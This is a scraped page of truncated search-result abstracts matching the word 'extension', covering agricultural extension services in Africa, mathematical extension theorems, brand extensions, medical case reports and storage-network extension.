Sani Yakubu; Bin Suandi, Turiman; Ismail, Ismi Arif; Omar, Zohara 2016-01-01 Research in extension education is a serious and challenging task facing Nigeria today because of new trends that keeps on emerging continuously. This paper seeks to examine some of the common research techniques used in extension education and describe their applicability and workability in helping people to help themselves. Most of the… 19. A glacier runoff extension to the Precipitation Runoff Modeling System Science.gov (United States) A. E. Van Beusekom; R. J. Viger 2016-01-01 A module to simulate glacier runoff, PRMSglacier, was added to PRMS (Precipitation Runoff Modeling System), a distributed-parameter, physical-process hydrological simulation code. The extension does not require extensive on-glacier measurements or computational expense but still relies on physical principles over empirical relations as much as is feasible while... Science.gov (United States) Ragasa, Catherine; Berhane, Guush; Tadesse, Fanaye; Taffesse, Alemayehu Seyoum 2013-01-01 Purpose: This article contributes new empirical evidence and nuanced analysis on the gender difference in access to extension services and how this translates to observed differences in technology adoption and agricultural productivity. Approach: It looks at the case of Ethiopia, where substantial investments in the extension system have been… 1. Evaluation of the effectiveness of the Imo State fisheriers extension ... African Journals Online (AJOL) This study evaluated the Imo State Ministry of Agriculture Fisheries Extension Programmes. Questionnaires were used to collect data from 15 randomly selected extension staff and 200 proportionately selected fish farmers from the three fisheries zones of the state between November 1997 and February 1998. Data were ... 2. Extension Youth Educators' Technology Use in Youth Development Programming Science.gov (United States) McClure, Carli; Buquoi, Brittany; Kotrlik, Joe W.; Machtmes, Krisanna; Bunch, J. C. 2014-01-01 The purpose of this descriptive-correlational study was to determine the use of technology in youth programming by Extension youth development educators in Louisiana, Mississippi, and Tennessee. Data were collected via e-mail and a SurveyMonkey© questionnaire. Extension educators are using some technology in youth development programming. More… 3. Twitter Chats: Connect, Foster, and Engage Internal Extension Networks Science.gov (United States) Seger, Jamie; Hill, Paul; Stafne, Eric; Swadley, Emy 2017-01-01 The eXtension Educational Technology Learning Network (EdTechLN) has found Twitter to be an effective form of informal communication for routinely engaging network members. Twitter chats provide Extension professionals an opportunity to reach and engage one other. As the EdTechLN's experimentation with Twitter chats has demonstrated, the use of… 4. Use of Demonstration Gardens in Extension: Challenges and Benefits Science.gov (United States) Glen, Charlotte D.; Moore, Gary E.; Jayaratne, K. S. U.; Bradley, Lucy K. 2014-01-01 Extension agents' use of demonstration gardens was studied to determine how gardens are employed in horticultural programming, perceived benefits and challenges of using gardens for Extension programming, and desired competencies. Gardens are primarily used to enhance educational efforts by providing hands-on learning experiences. Greatest… 5. The path group construction of Lie group extensions OpenAIRE Vizman, Cornelia 2007-01-01 We present an explicit realization of abelian extensions of infinite dimensional Lie groups using abelian extensions of path groups, by generalizing Mickelsson's approach to loop groups and the approach of Losev-Moore-Nekrasov-Shatashvili to current groups. We apply our method to coupled cocycles on current Lie algebras and to Lichnerowicz cocycles on the Lie algebra of divergence free vector fields. 6. Journal of Agricultural Extension Vol.17 (2) December, 2013 ISSN ... African Journals Online (AJOL) ONIKOYI The results confirm apriori expectation that the use of ICT facilities was higher among extension agents than rural farmers. This may be because of their level of education and income status. This implies that extension agents can also be used in the dissemination of information about and adoption of internet among farmers ... 7. Challenges of extension workers in reaching rural women farmers in ... African Journals Online (AJOL) The study examined the challenges of extension workers in reaching rural women farmers in Enugu State Nigeria. Questionnaire was used to collect data from a sample size of 52 extension workers. Data were analyzed using percentage, mean statistic, chart and factor analysis. Results revealed that training and visit ... 8. Assessment of Extension Service Delivery on Improved Cassava ... African Journals Online (AJOL) SH Assessment of Extension Service Delivery on Improved. Cassava Technologies Among Cassava Farmers in Osun. State, Nigeria. 1. Ajala, A. O.,. 1. Ogunjimi, S.I. and. 2. Farinde, A.J.. 1Department of Agricultural Extension and Rural Development, Landmark University, Omu –Aran, Kwara. State. 2Department of Agricultural ... 9. Reforming the Public Agricultural Extension System in China ... International Development Research Centre (IDRC) Digital Library (Canada) Reforming the Public Agricultural Extension System in China : Supporting Rural Innovation. The public agricultural extension system has played a critical role in Chinese agricultural development over the past few decades. There is growing evidence that since the mid-1990s the system has failed to provide new and ... 10. The Impact Of Information And Communication In Extension ... African Journals Online (AJOL) The article examines the impact of information and communication in extension services to rural farmers in Niger- Delta. Questionnaire, interview and personal observation methods were employed to elicit information on the impact information and communication in extension services to rural farmers. The study reveals the ... 11. Achieving Impact at Scale through ICT-Enabled Extension Services ... International Development Research Centre (IDRC) Digital Library (Canada) The Government of Ghana is looking for alternatives to conventional extension services to ensure better outreach to poor farmers and rural women. The expansion of mobile technology will connect farmers to extension resources and link them to profitable markets. The research team will scale up an ICT-based agricultural ... 12. Challenges and agricultural extension needs of urban and peri ... African Journals Online (AJOL) ... management (M=2.00), among others. Extension agents should regularly disseminate information on livestock production to urban and peri-urban livestock keepers via training, demonstration sessions or other extension teaching methods. Keywords: Animals, Constraints, dissemination, Farmers, Information, Production ... 13. Evaluation Of The Job Performance Of Extension Professionals In ... African Journals Online (AJOL) The study was design to assess the job performance of extension professionals in Abia state agricultural development programme (ADP). The study also highlighted the relationship between selected personal characteristics and job performance variables of extension professionals in Abia state ADP. A sample of ninety six ... 14. Determinants of job effectiveness of extension personnel in Oyo ... African Journals Online (AJOL) The study examined the determinants of job effectiveness of extension personnel of OYSADEP and FADU organizations. Disproportionate sampling procedure was used to select 94% and 81% from the population of extension personnel in the two organizations to obtain 120 respondents for the study. Structured and ... 15. Journal of Agricultural Extension Vol.17 (2) December, 2013 ISSN ... African Journals Online (AJOL) ONIKOYI gone into maintaining its organization and staffing (Qamar, 2005). Public institutions are funded with the public funds and as such are supposed to serve the public. In the case of agricultural extension, the organization is meant to serve the extension, education and training needs of both EAs and farmers (Qamar, 2005). 16. Extensive peritoneal calcifications associated with continuous ambulatory peritoneal dialysis Energy Technology Data Exchange (ETDEWEB) Kim, Hyo Cheol; Kim, Tae Kyoung; Han, Joon Koo; Choi, Ja Young; Lee, Dong Kyung; Choi, Byung Ihn [College of Medicine and the Institute of Radiation Medicine, Seoul National University, Seoul (Korea, Republic of); Park, Yang Hee [National Police Hospital, Seoul (Korea, Republic of) 2000-07-01 Peritoneal calcification, which can lead to intestinal obstruction and potentially lethal hemoperitoneum, is a rare complication of continuous ambulatory peritoneal dialysis. We describe a case in which extensive peritoneal calcification had arisen for this reason. Although the patient was asymptomatic, extensive calcification was present on the parietal and visceral peritoneum, including the hepatic and splenic surface. (author) 17. Ocular discomforts following eyelash extension | Koffuor | Journal of ... African Journals Online (AJOL) Eyelash extension has become common practice for enhancing beauty among Ghanaian women on occasions such as weddings, festivities, and other social gatherings including funerals. This study was therefore conducted to ascertain the effect of eyelash extension on the eyelid and on vision. One hundred and twenty ... 18. Extension and advisory services: the African renaissance | Zwane ... African Journals Online (AJOL) These organisations can be considered as a source of renaissance in agricultural advisory services. They have facilitated the development of structures that advocate for extension and advisory services. These organisations have brought focus, and initiated debate on the concept of extension. The importance of such ... 19. Community Health: FCS Extension Educators Deliver Diabetes Education in PA Science.gov (United States) Cox, Jill N.; Corbin, Marilyn 2011-01-01 For decades, family and consumer sciences (FCS) Extension educators have provided health related education to consumers through Cooperative Extension programming at land grant universities. However, offering diabetes education can be extra challenging due to the complicated nature of the disease and the multi-faceted treatment required. Faced with… 20. Challenges facing the agricultural extension landscape in South ... African Journals Online (AJOL) The role of the South African Society for Agricultural Extension (SASAE) in the way forward will be to: Determine continuously what the agricultural extension landscape will need in 10 years' time; establish and implement a Continuous Professional Development (CPD) Committee to ensure continuing professional ... 1. Indicators for Evaluating County Extension Office Computer Uses. Science.gov (United States) Wright, M. Anthony; Long, James S. Extension leadership articulated several broad goals for the use of microcomputers within cooperative extension. These included providing information, service to clients, office automation, and enhancement of the educational process. A questionnaire was administered regarding microcomputer use within Washington State University County Cooperative… 2. Packaging Research Outputs into Extension and Training Materials ... African Journals Online (AJOL) As a result one primary objective of research to develop improved production systems and get the research results out to the user is not achieved. This paper describes the experiences and lessons learned in packaging research outputs into extension and training materials for use by extension workers and farmers under ... 3. Assessment of veterinary extension services to livestock farmers in ... African Journals Online (AJOL) The study examined operational modes of providing veterinary extension services to livestock farmers in Egba-Division, Ogun-State Nigeria. Information was obtained from 120 livestock farmers and 8 extension agents selected through multi-stage random sampling technique with the use of both structured questionnaire ... 4. Study of the Working Conditions of Health Extension Workers in ... African Journals Online (AJOL) Coverage: 2005-2009” of which “The Health Extension Program (HEP)” is a major component”. Objective: The study focuses on the first batch of Health Extension Workers (HEWs) with the overall objective of assessing the working conditions of HEWs and their job satisfaction. Methods: An in-depth field study was carried ... 5. Problems associated with extension visists among maize farmers in ... African Journals Online (AJOL) This study investigated the problems related to field visits carried out by extension staff to farmers in the rural areas. A total of 125 farmers were purposively and randomly sampled for this study from two villages, in Kaduna State, Nigeria. The three objectives were; (1) to identify the period of extension visits carried out by the ... 6. Assessment of Extension Service Delivery on Improved Cassava ... African Journals Online (AJOL) Extension service delivery is too often merely seen as a vehicle for spreading scientific and technical progress and technology transfer. In the real sense, however, dissemination of knowledge is not a one way affair from scientists to producers. The study was conducted to assess extension service delivery on improved ... 7. On non-extensive nature of thermal conductivity obtained for the silica aerogel thermal conductivity data at low temperature. Keywords. Non-extensive; thermal conductivity; specific heat; silica aerogels. PACS Nos 65.60.+a; 63.70.+h; 64.60.-i. 1. Motivation. Non-extensive statistics is being increasingly used to explain anomalous behaviour observed in the properties of ... 8. 9 CFR 124.20 - Patent term extension calculation. Science.gov (United States) 2010-01-01 ... 9 Animals and Animal Products 1 2010-01-01 2010-01-01 false Patent term extension calculation. 124... OF AGRICULTURE VIRUSES, SERUMS, TOXINS, AND ANALOGOUS PRODUCTS; ORGANISMS AND VECTORS PATENT TERM RESTORATION Regulatory Review Period § 124.20 Patent term extension calculation. (a) As provided in 37 CFR 1... 9. Motivational needs assessment of extension agents of Abia State ... African Journals Online (AJOL) This study assessed the motivational needs of extension agents of Abia Agricultural Development Project. Stratified random sampling technique was adopted to select a total of 128 extension agents (EAs) from the State. Data on the effects of various needs/motivational theories (as Maslows' needs hierarchy theory, ... 10. Issues for Agricultural Extension Policy in Nigeria | Koyenikan ... African Journals Online (AJOL) The paper suggests as the goal; achievement of a well organized extension system for efficient and effective extension delivery in all aspects of sustainable agriculture and rural development to attain food security, poverty reduction, rural empowerment and environment management. It concludes with a summary of key ... 11. The compatibility between extension aims of staff and their ... African Journals Online (AJOL) This pilot investigation was done to investigate the compatibility between extension aims of extension staff and those of their employer. It shows that only 50 percent of respondents have an acceptable understanding of the official aims (vision), and that none of the components of the official vision has sufficient compatibility ... 12. Assessment of training needs of extension staff of agricultural ... African Journals Online (AJOL) The tasks performed by the extension staff ranged from advising farmers on improving methods of farming to new task on health issues such as campaign on HIV/AIDS. The study identified strong training needs for Edo State extension agents on communication skills (X= 4.60), planning demonstration (X=4.60), evaluation of ... 13. Factors influencing extension service delivery in maize production ... African Journals Online (AJOL) Conventional extension system in Tanzania has recorded limited success in improving agricultural productivity including maize production in the country. The Agricultural Innovation System (AIS) approach in extension service delivery deemed desirable in addressing the challenge. However little is known about the factors ... 14. 76 FR 36996 - Extension of Time for Filing Returns Science.gov (United States) 2011-06-24 ... partnership's last known address. For further guidance regarding the definition of last known address, see Sec... extensions of time to file returns for partnership, trust, and estate taxpayers, and automatic extensions of... entities (most partnerships, estates, and certain trusts). As these pass-through entities were previously... 15. 78 FR 79660 - Enhancing Agricultural Coexistence; Extension of Comment Period Science.gov (United States) 2013-12-31 ...] Enhancing Agricultural Coexistence; Extension of Comment Period ACTION: Notice; extension of comment period... order to further agricultural coexistence. This action will allow interested persons additional time to... among those involved in diverse agricultural systems on the topic of coexistence as well as how USDA can... 16. Extremal extensions for the sum of nonnegative selfadjoint relations NARCIS (Netherlands) Hassi, Seppo; Sandovici, Adrian; De Snoo, Henk; Winkler, Henrik 2007-01-01 The sum A + B of two nonnegative selfadjoint relations (multivalued operators) A and B is a nonnegative relation. The class of all extremal extensions of the sum A + B is characterized as products of relations via an auxiliary Hilbert space associated with A and B. The so-called form sum extension 17. evaluation of job performance of village extension agents in lagos African Journals Online (AJOL) AFINNI IMAM A Case For Participatory (Cost Sharing) Approach to Agricultural. Extension Delivery in .... According to Ozor et al (2007), cost-sharing extension approach involves government-farmer partnership in the funding of .... (i) Prevailing unfavourable economic environment within the national economy: Apparent misgivings about ... 18. Private sector participation in agricultural extension service in nigeria African Journals Online (AJOL) The issue of who is to undertake and sustain an efficient agricultural extension service delivery between the public and private sectors in sub-saharan Africa has continued to feature prominently among the extension stakeholders and professionals. This has become pertinent, especially in recent times where government's ... 19. Making the Case for Demographic Data in Extension Programming Science.gov (United States) Curtis, Katherine J.; Verdoff, Daniel; Rizzo, Bill; Beaudoin, James 2012-01-01 Understanding one's community is essential for effective Extension programming across all program areas. The use of current and reliable demographic data is crucial for Extension to develop effective education and programming to track change and to uncover hidden community characteristics. We discuss what demographic data are, present… 20. Modes of continental extension in a crustal wedge KAUST Repository Wu, Guangliang 2015-07-01 © 2015 Elsevier B.V. We ran numerical experiments of the extension of a crustal wedge as an approximation to extension in an orogenic belt or a continental margin. We study the effects of the strength of the lower crust and of a weak mid-crustal shear zone on the resulting extension styles. A weak mid-crustal shear zone effectively decouples upper crustal extension from lower crustal flow. Without the mid-crustal shear zone, the degree of coupling between the upper and the lower crust increases and extension of the whole crust tends to focus on the thickest part of the wedge. We identify three distinct modes of extension determined by the strength of the lower crust, which are characterized by 1) localized, asymmetric crustal exhumation in a single massif when the lower crust is weak, 2) the formation of rolling-hinge normal faults and the exhumation of lower crust in multiple core complexes with an intermediate strength lower crust, and 3) distributed domino faulting over the weak mid-crustal shear zone when the lower crust is strong. A frictionally stronger mid-crustal shear zone does not change the overall model behaviors but extension occurred over multiple rolling-hinges. The 3 modes of extension share characteristics similar to geological models proposed to explain the formation of metamorphic core complexes: 1) the crustal flow model for the weak lower crust, 2) the rolling-hinge and crustal flow models when the lower crust is intermediate and 3) the flexural uplift model when the lower crust is strong. Finally we show that the intensity of decoupling between the far field extension and lower crustal flow driven by the regional pressure gradient in the wedge control the overall style of extension in the models. 1. Solutions to Burnout and Retention as Perceived by County Extension Agents of the Colorado State University Extension System Directory of Open Access Journals (Sweden) Matt Benge 2015-02-01 Full Text Available This study explored solutions to the issue of burnout and retention of Extension agents. Extension agents experience burnout for reasons such as long hours, stress, and organizational factors. As Extension administration addresses job satisfaction and performance of Extension employees, burnout and retention issues identified in this study can facilitate efforts to enhance the effectiveness of a statewide Extension program. Herzberg’s Motivation-Hygiene Theory was the theoretical framework for this study. Researchers used the constant-comparative method of analysis to identify recurring themes from the open-ended items of an online-administered survey. Twelve primary themes emerged, including (a compensation, (b hiring practices, (c promotion and advancement within Extension, (d organizational support regarding agent development, (e organizational support regarding administration, (f organizational support regarding colleagues, (g reporting, (h recognition, (i resources, (j personnel and staffing, (k evaluation of administration and specialists, and (l workload. Results suggest that Extension administration should focus on the maintenance factors of compensation, workload, and internal promotion and advancement, as well as motivating factors, to improve retention of Extension agents. 2. Modeling Brand Extension as a Real Option: How Expectation, Competition and Financial Constraints Drive the Timing of Extensions NARCIS (Netherlands) L.H. Pattikawa 2006-01-01 textabstractDespite their strategic importance firm’s motivations to extend brands have received only modest attentions by marketing scholars. We use multiple events duration models to examine the timing of launching brand extensions. We provide a theoretical framework of brand extensions based on 3. How different are ICT-supported pedagogical practices from extensive and non-extensive ICT-using science teachers? NARCIS (Netherlands) Voogt, Joke 2009-01-01 This paper aims to understand the differences between characteristics of ICT-supported pedagogical practices of grade 8 science teachers of extensive and non-extensive ICT-using science teachers. The differences of the pedagogical practices are described in terms of innovative and traditionally 4. Surveillance extension experience at WWER-440 type reactors International Nuclear Information System (INIS) Gillemot, F.; Uri, G.; Oszwald, F.; Trampus, P. 1993-01-01 In WWER-440 reactors, the surveillance specimens are located in accelerated irradiation positions. After 5 years, all specimens are withdrawn and the operational changes are not monitored. At Paks NPP a new surveillance program extension has been settled in order to avoid these original program disadvantages and generate further data for plant lifetime management. This paper includes: research performed to prepare the surveillance extension programme, the evaluation method for the surveillance extension, and first results (Charpy and tensile tests). (authors). 6 refs., 12 figs., 3 tabs 5. Nuclear modification factor using Tsallis non-extensive statistics Energy Technology Data Exchange (ETDEWEB) Tripathy, Sushanta; Garg, Prakhar; Kumar, Prateek; Sahoo, Raghunath [Indian Institute of Technology Indore, Discipline of Physics, School of Basic Sciences, Simrol (India); Bhattacharyya, Trambak; Cleymans, Jean [University of Cape Town, UCT-CERN Research Centre and Department of Physics, Rondebosch (South Africa) 2016-09-15 The nuclear modification factor is derived using Tsallis non-extensive statistics in relaxation time approximation. The variation of the nuclear modification factor with transverse momentum for different values of the non-extensive parameter, q, is also observed. The experimental data from RHIC and LHC are analysed in the framework of Tsallis non-extensive statistics in a relaxation time approximation. It is shown that the proposed approach explains the R{sub AA} of all particles over a wide range of transverse momentum but does not seem to describe the rise in R{sub AA} at very high transverse momenta. (orig.) 6. Development of a University Extension Program in a Federal Penitentiary Science.gov (United States) McCleary, Charles H. 1974-01-01 The report documents the development and the results of the educational program in the Saskatchewan Penitentiary from 1971 through 1974. Available from: Extension Division, University of Saskatchewan, Saskatoon S7N OWO. (MW) 7. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) Ben Stevens ; Jacobson,. 2013:30; Fischer, Van den ... 13 Unit for Environmental Sciences and Management, North-West University, Potchefstroom, 2520, South. Africa. ..... dissemination media by extension personnel may adversely affect the potential for. 8. South African Journal of Agricultural Extension - Vol 35 (2006) African Journals Online (AJOL) Job satisfaction amongst agricultural extension personnel in Kurdistan Province of Iran · EMAIL FREE FULL TEXT EMAIL FREE FULL TEXT · DOWNLOAD FULL TEXT DOWNLOAD FULL TEXT. A Rezvanfar, H Vaisy, 176-187 ... 9. Minding the gap between policy and practice amongst extension ... African Journals Online (AJOL) ) provides the contextual and institutional framework for all of governments activities. As a result, there is a call for extension to increasingly become associated with efficient and effective delivery of services in line with government policy to ... 10. Extensive cerebral and cerebellar calcifications in primary hypoparathyroidism Energy Technology Data Exchange (ETDEWEB) Kock, C.; Kruse, H.P. 1982-09-01 This is a report on a patient with primary hypoparathyreoidism showing extensive calcifications of cerebrum and cerebellum in computed tomography. Nevertheless, the patient does not have any neurological disturbances. 11. Extension encourages parents to take a stand against bullying OpenAIRE Sutphin, Michael D. 2008-01-01 As students return to classrooms and playgrounds around the commonwealth for a new school year, Virginia Cooperative Extension is urging parents to talk to their child about bullying and to understand their school's policies on this important topic. 12. Assessment of Extension Service Delivery on Improved Cassava ... African Journals Online (AJOL) SH 1Department of Agricultural Extension and Rural Development, Landmark University, Omu –Aran, Kwara. State. 2Department ... production technologies among cassava farmers in Osun State, Nigeria. Multistage ... included fertilizer procurement, agrochemicals, cooperative facilities, social networks, tractor hiring services,. 13. A facility for creating Python extensions in C++ International Nuclear Information System (INIS) Dubois, P F 1998-01-01 Python extensions are usually created by writing the glue that connects Python to the desired new functionality in the C language. While simple extensions do not require much effort, to do the job correctly with full error checking is tedious and prone to errors in reference counting and to memory leaks, especially when errors occur. The resulting program is difficult to read and maintain. By designing suitable C++ classes to wrap the Python C API, we are able to produce extensions that are correct and which clean up after themselves correctly when errors occur. This facility also integrates the C++ and Python exception facilities. This paper briefly describes our package for this purpose, named CXX. The emphasis is on our design choices and the way these contribute to the construction of accurate Python extensions. We also briefly relate the way CXX's facilities for sequence classes allow use of C++'s Standard Template Library (STL) algorithms on C++ sequences 14. Extensions of solutions of a functional equation in two variables Directory of Open Access Journals (Sweden) Janusz Matkowski 2009-01-01 Full Text Available An extension theorem for the functional equation of several variables \$f(M(x,y=N(f(x,f(y,\$ where the given functions \\(M\\ and \\(N\\ are left-side autodistributive, is presented. 15. Research and extension processes and practices in relation to ... African Journals Online (AJOL) African Journals Online (AJOL) , Institute for Agricultural Research, Ahmadu Bello University, Zaria. 2Dept. of Agricultural Economics and Extension, Usmanu Danfodiyo University, Sokoto. 3Dept. of Agricultural Economics and Rural Sociology, Ahmadu Bello University, Zaria. 17. 78 FR 15743 - Proposed Extension of Existing Collection; Comment Request Science.gov (United States) 2013-03-12 ..., or Email). SUPPLEMENTARY INFORMATION: I. Background Section 423 of the Black Lung Benefits Act, as... black lung benefits as required by the Act. Type of Review: Extension. Agency: Office of Workers... 18. Is agricultural extension positioned to promote agripreneurship in ... African Journals Online (AJOL) scale agriculture in South Africa and to make it more attractive and a profitable venture. The question is whether small-scale farmers can become entrepreneurs and how well is extension positioned to support farmers to foster entrepreneurship ... 19. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza Keywords: baseline survey; land reform; farm management; extension. ABSTRACT. Land reform ... Government. 5 Department of Agricultural Management, School for Natural Resource Management, Nelson Mandela ..... reform farmers. About 50% of the farms indicated a practice of having definite breeding seasons, with. 20. 31 CFR 545.414 - Loans or extensions of credit. Science.gov (United States) 2010-07-01 ...) OFFICE OF FOREIGN ASSETS CONTROL, DEPARTMENT OF THE TREASURY TALIBAN (AFGHANISTAN) SANCTIONS REGULATIONS... loans or extensions of credit to a person in the territory of Afghanistan controlled by the Taliban... 1. 11 CFR 100.55 - Extension of credit. Science.gov (United States) 2010-01-01 ... substantially similar to extensions of credit to nonpolitical debtors that are of similar risk and size of obligation. If a creditor fails to make a commercially reasonable attempt to collect the debt, a contribution... 2. Case Series: Cyclops lesion - extension loss after ACL reconstruction Directory of Open Access Journals (Sweden) Dhanda Sunita 2010-01-01 Full Text Available Localized anterior arthrofibrosis (cyclops lesion is the second most common cause of extension loss after anterior cruciate ligament (ACL reconstruction. We present and discuss two patients with prior ACL reconstructions, who presented with pain and loss of extension following surgery. MRI and arthroscopy of the knee revealed typical features of a cyclops lesion. The patients showed significant symptomatic improvement following arthroscopic resection of these lesions. 3. Another extension of Orlicz-Sobolev spaces to metric spaces Directory of Open Access Journals (Sweden) Noureddine Aïssaoui 2004-01-01 Full Text Available We propose another extension of Orlicz-Sobolev spaces to metric spaces based on the concepts of the Φ-modulus and Φ-capacity. The resulting space NΦ1 is a Banach space. The relationship between NΦ1 and MΦ1 (the first extension defined in Aïssaoui (2002 is studied. We also explore and compare different definitions of capacities and give a criterion under which NΦ1 is strictly smaller than the Orlicz space LΦ. 4. Rural household and resources: A guide for extension workers OpenAIRE Socio-Economic and Gender Analysis Programme (SEAGA) 2004-01-01 Metadata only record This guide is divided into three parts: Part 1 explores themes on farmers, households, resources and extension. Each point raises questions on gender roles and gender relations, stressing the importance of gender-disaggregated data. Part 2 focuses on constraints and resources in rural households. Major issues such as HIV, macro-level policies, and income generating opportunities affect communities differently, so extension workers can help identify impacts and needs ac... 5. Scattering theory for non-selfadjoint extensions of symmetric operators OpenAIRE Cherednichenko, Kirill D.; Kiselev, Alexander V.; Silva, Luis O. 2017-01-01 This work deals with the functional model for extensions of symmetric operators and its applications to the theory of wave scattering. In terms of Boris Pavlov's spectral form of this model, we find explicit formulae for the action of the unitary group of exponentials corresponding to almost solvable extensions of a given closed symmetric operator with equal deficiency indices. On the basis of these formulae, we are able to construct wave operators and derive a new representation for the scat... 6. Topology Design for Directional Range Extension Networks with Antenna Blockage Science.gov (United States) 2017-03-19 Topology Design for Directional Range Extension Networks with Antenna Blockage Thomas Shake MIT Lincoln Laboratory [email protected] Abstract...associated electronics into small aircraft to perform such range extension. In particular, the paper examines trade-offs in network topology design...aircraft, and the topology characteristics of the aerial relay network. The analysis suggests that low-degree air topologies such as rings and strings 7. Old people's extensive traumatic cerebral infarction (analysis of 48 cases) International Nuclear Information System (INIS) Xu Wenhui 2000-01-01 Objective: To analyse clinically the genetic mechanism, clinical characteristics and the prognosis of old people's extensive traumatic cerebral infarction. Method: Forty eight such cases have been observed and analysed. Results: Old people's extensive traumatic cerebral infarction had its characteristics, which occurred mostly in the blood supply area of big branch blood vessels, and had observed nerve function defect. Conclusion: It has more clinical complication and bad prognosis. The death rate is high 8. Timber productivity research gaps for extensive forest management Science.gov (United States) L.C. Irland 2011-01-01 On extensive areas of small scale forests, significant opportunities for improving the value of future timber harvests while also improving other resource values are now being missed. A new focus on practical extensive management research is needed, especially as implementation of intensive practices has been declining in many areas, and new ‘‘close to nature’’... OpenAIRE Ferdila, Raihani 2014-01-01 The study investigates benefits of using extensive reading in teaching reading and as well as students' attitudes toward it. A case study design as a part of qualitative research was employed in this study. The data were collected through classroom observation, questionnaire and interview. The participants of this study were a class of second graders in one of the public junior high schools in Bandung. The findings reveal that extensive reading was beneficial in teaching reading. There are fi... 10. Pricing of brand extensions based on perceptions of brand equity Directory of Open Access Journals (Sweden) Panagiotis Arsenos 2018-04-01 Full Text Available The paper explores the role of brand equity when pricing hypothetical brand extensions. Companies tend to use different pricing techniques for their products, and their pricing decisions are based on many factors, including image and category fit of the product with the existing image and products of the company. Brand extensions are usually investigated from a consumer perspective, focusing on the extension attitude, however, it is essential to understand the corporate decision-making process regarding pricing. Exploring this matter using quantitative research methods, the study provides empirical evidence that companies that have invested heavily in marketing actions in the past and have built strong brand equity over-time, show flexibility in the mark-up during the cost decision-making process of a hypothetical brand extensions. Variations in mark-up percentages are also observed when there is a difference in image and category fit of the extension to the original brand. However, companies characterized by greater brand equity exhibited greater flexibility in the mark-up percentages, even for low fit extensions. 11. Absolutely minimal extensions of functions on metric spaces International Nuclear Information System (INIS) Milman, V A 1999-01-01 Extensions of a real-valued function from the boundary ∂X 0 of an open subset X 0 of a metric space (X,d) to X 0 are discussed. For the broad class of initial data coming under discussion (linearly bounded functions) locally Lipschitz extensions to X 0 that preserve localized moduli of continuity are constructed. In the set of these extensions an absolutely minimal extension is selected, which was considered before by Aronsson for Lipschitz initial functions in the case X 0 subset of R n . An absolutely minimal extension can be regarded as an ∞-harmonic function, that is, a limit of p-harmonic functions as p→+∞. The proof of the existence of absolutely minimal extensions in a metric space with intrinsic metric is carried out by the Perron method. To this end, ∞-subharmonic, ∞-superharmonic, and ∞-harmonic functions on a metric space are defined and their properties are established 12. Detection of myocardial infarct extension by CK-B radioimmunoassay International Nuclear Information System (INIS) Rothkopf, M.; Boerner, J.; Stone, M.J.; Smitherman, T.C.; Buja, L.M.; Parkey, R.W.; Willerson, J.T. 1979-01-01 Myocardial infarct extension after the acute event was defined as a second rise in the myocardial isoenzyme of serum creatine kinase (CK-B) after the initial return of CK-B to normal values. In 43 patients with acute myocardial infarct, CK-B was measured by radioimmunoassay every 12 hrs for 14 days. Nineteen patients had anterior transmural myocardial infarcts (AMI), 14 had inferior transmural myocardial infarcts (IMI), and 10 had subendocardial myocardial infarcts (SEMI). Infarct extension as detected by a second rise in serum CK-B occurred in six patients (32%) with AMI, two (14%) with IMI, and two (20%) with SEMI. Four patients with AMI also had clinically evident infarct extension. In the other six, the infarct extension was undetected clinically. The measurement of serum CK-B values with a quantitative and sensitive assay suggests that myocardial infarct extension occurs more commonly than clinically recognized, but the frequency of extension may be less than that reported in patients in whom precordial mapping and total serum CK values were measured to identify this phenomenon 13. The extension of collective agreements to non parties Directory of Open Access Journals (Sweden) Stella Vettori 2014-01-01 Full Text Available There is a theme of majoritarianism running through the Labour Relations Act 66 of 1995 (LRA. Part of this theme is legislation that provides for the extension of collective agreements reached at sectoral level to non -parties. After due consideration of arguments for and against the extension of collective agreements, the conclusion is reached that the extension of collective agreements can potentially, under certain circumstances, increase unemployment and consequently inhibit the growth of small and medium sized firms. In the light of this possibility and with due regard to the stated objectives of the LRA, it is suggested that the legislation that makes provision for the extension of collective agreements to non –parties in section 32(g of the LRA should be given a purposive interpretation. It is suggested that in giving effect to this provision the effects on the labour market of any proposed extension of a collective agreement must be considered, before extension by the Minister of Labour. 14. Designing and application of SAN extension interface based on CWDM Science.gov (United States) Qin, Leihua; Yu, Shengsheng; Zhou, Jingli 2005-11-01 As Fibre Channel (FC) becomes the protocol of choice within corporate data centers, enterprises are increasingly deploying SANs in their data central. In order to mitigate the risk of losing data and improve the availability of data, more and more enterprises are increasingly adopting storage extension technologies to replicate their business critical data to a secondary site. Transmitting this information over distance requires a carrier grade environment with zero data loss, scalable throughput, low jitter, high security and ability to travel long distance. To address this business requirements, there are three basic architectures for storage extension, they are Storage over Internet Protocol, Storage over Synchronous Optical Network/Synchronous Digital Hierarchy (SONET/SDH) and Storage over Dense Wavelength Division Multiplexing (DWDM). Each approach varies in functionality, complexity, cost, scalability, security, availability , predictable behavior (bandwidth, jitter, latency) and multiple carrier limitations. Compared with these connectiviy technologies,Coarse Wavelength Division Multiplexing (CWDM) is a Simplified, Low Cost and High Performance connectivity solutions for enterprises to deploy their storage extension. In this paper, we design a storage extension connectivity over CWDM and test it's electrical characteristic and random read and write performance of disk array through the CWDM connectivity, testing result show us that the performance of the connectivity over CWDM is acceptable. Furthermore, we propose three kinds of network architecture of SAN extension based on CWDM interface. Finally the credit-Based flow control mechanism of FC, and the relationship between credits and extension distance is analyzed. 15. Muscle strategies for leg extensions on a "Reformer" apparatus. Science.gov (United States) Cantergi, Débora; Loss, Jefferson Fagundes; Jinha, Azim; Brodt, Guilherme Auler; Herzog, Walter 2015-04-01 Considering the kinematics of leg extensions performed on a Reformer apparatus, one would expect high activation of hip and knee extensor muscle groups. However, because of the bi-articular nature of some lower limb muscles, and the possibility to vary the direction of force application on the Reformer bar, muscles can be coordinated theoretically in a variety of ways and still achieve the desired outcome. Hence, the aim of this study was to determine the knee and hip moments during leg extensions performed on the Reformer apparatus and to estimate the forces in individual muscles crossing these joints using static optimization. Fifteen subjects performed leg extensions exercises on the Reformer apparatus using an individually chosen resistance. To our big surprise, we found that subjects performed the exercise using two conceptually different strategies (i) the first group used simultaneous hip and knee extension moments, (ii) while the second group used simultaneous hip flexion and knee extension moments to perform the exercise. These different strategies were achieved by changing the direction of the resultant force applied by the subject's feet on the Reformer bar. While leg extensions on the Reformer apparatus have been thought to strengthen the hip and knee extensors muscles, our results demonstrate that patients can perform the exercise in a different and unexpected way. In order to control the hip and knee moments and achieve the desired outcome of the exercise, the direction of force application on the 